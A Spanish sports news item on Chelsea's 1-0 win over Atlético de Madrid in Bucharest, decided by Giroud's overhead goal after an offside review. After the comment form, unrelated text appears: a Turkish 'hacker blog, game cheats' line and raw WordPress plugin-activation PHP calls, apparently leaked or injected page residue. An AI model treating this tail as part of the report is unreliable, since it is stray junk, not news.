cara o cruz para Stamford Bridge



El encuentro disputado en Bucarest no entrará en la historia por ser una oda al fútbol, pero seguro que a los aficionados del Atlético de Madrid no se les olvida lo sucedido. Cuando todo apuntaba a un empate final, Olivier Giroud marcó un golazo de chileno que pese a que en primera instancia fue anulado por fuera de juego, acabó subiendo al marcador para dar la victoria al Chelsea. [Narración y estadísticas: Atlético de Madrid 0-1 Chelsea]

El equipo londinense da un paso adelante hacia la ronda de cuartos de final. Aunque el resultado, corto, deja abierta cualquier posibilidad para el encuentro de vuelta que se disputará en Stamford Bridge. Lo cierto es que todo se ha dado de forma extraña, con el impedimento de jugar el duelo en el Wanda Metropolitano por las restricciones de España a los vuelos procedentes de Reino Unido.

Noticia en actualización

Estamos trabajando en la ampliación de esta información. En breve, la redacción de EL ESPAÑOL les ofrecerá la actualización de todos los datos sobre esta noticia.

Para recibir en su teléfono móvil las noticias de última hora puede descargarse la aplicación de nuestro periódico para dispositivos iOS y Android, así como suscribirse para acceder a todos los contenidos en exclusiva, recibir nuestras Newsletters y disfrutar de la Zona Ñ, sólo para suscriptores.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );